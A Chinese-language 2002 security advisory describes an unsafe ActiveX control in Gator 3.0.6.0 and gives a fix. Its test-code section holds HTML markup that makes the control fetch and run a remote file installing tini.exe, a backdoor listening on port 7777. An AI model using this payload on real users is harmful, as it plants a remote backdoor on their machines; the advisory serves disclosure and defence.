Gator存在不安全ActiveX控件漏洞发布时间:2002-02-25 更新时间:2002-02-25 严重程度:中 威胁程度:欺骗 错误类型:设计错误 利用方式:客户机模式 BUGTRAQ ID:4161 受影响系统 Gator Gator 3.0.6.0详细描述 Gator 是一款设计用来自动开发基于WEB表单的程序。 Gator使用ActiveX控件来安装,通过从Gator站点下载和执行安装程序完成,在 Gator安装完全以后,这个ActiveX控件继续保留。 任何HTML页面可以指定Gator安装文件的位置,安装文件被下载后,然后检查文件 名是否是setup.ex_,然后在解压执行,如果文件不是被压缩的,它会继续执行。 恶意用户可以通过建立简单的WEB页,使目标用户下载并执行木马等有害文件。 测试代码 <xbject id="IEGator" classid="CLSID:29EEFF42-F3FA-11D5-A9D5-00500413153C" codebase="http://www.gator.com/download/2500/iegator_3061_gatorsetup.cab" align="baseline" border="0" width="400" height="20"> <pxram name="params" value="fcn=setup&src=eyeonsecurity.net/advisories/gatorexploit/setup.ex_&bgc olor=F0F1D0&aic=",aicStr,"&"> </xbject> 这会安装tini.exe程序,这个程序会监听7777端口,tini.exe程序可以通过如下地址找到:http://www.ntsecurity.nu/toolbox/tini/ 解决方案 建议删除ActiveX 控件,其位于WINDOWS系统目录下的'Downloaded Program Files'目录下。 相关信息 obscure <obscure@eyeonsecurity.net> 参考:http://online.securityfocus.com/archive/1/257550 相关主页:http://www.gator.com/ |
